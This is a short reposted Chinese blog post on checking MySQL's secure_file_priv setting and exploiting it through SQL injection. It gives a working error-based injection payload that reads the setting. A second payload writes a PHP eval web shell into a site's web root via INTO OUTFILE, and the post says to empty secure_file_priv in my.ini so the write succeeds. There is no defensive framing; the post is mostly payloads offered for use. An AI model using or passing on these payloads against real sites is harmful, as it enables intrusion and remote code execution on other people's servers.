查看mysql是否有文件读写权限，sql注入查询secure_file_priv权限

本文转载自查看原文 2021-05-24 20:02 3354 SQL

show VARIABLES like '%secure%'

sql注入中的使用方法

查询secure_file_priv权限
?id=43 ) and extractvalue(1, concat(0x7e, (select @@global.secure_file_priv),0x7e)) --+(

写shell
?id=43 ) and extractvalue(1, concat(0x7e, (select “<?php @eval($_POST['pass']);?>” INTO OUTFILE “D:\wwwroot\xxx.com\Runtime\2.php”),0x7e)) --+(

如果不显示需要配置my.ini

添加secure_file_priv=""

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 MYSQL新特性secure_file_priv读写文件 MYSQL新特性secure_file_priv对读写文件的影响 mysql --secure_file_priv的设置 mysql之突破secure_file_priv写shell mysql之突破secure_file_priv写webshell 解决Mysql 8.0中secure_file_priv的问题 sql注入--高权限，load_file读写文件 MYSQL数据导出与导入，secure_file_priv参数设置 Mysql 导入文件提示 --secure-file-priv option 问题 secure_file_priv 配置项对数据导入导出的影响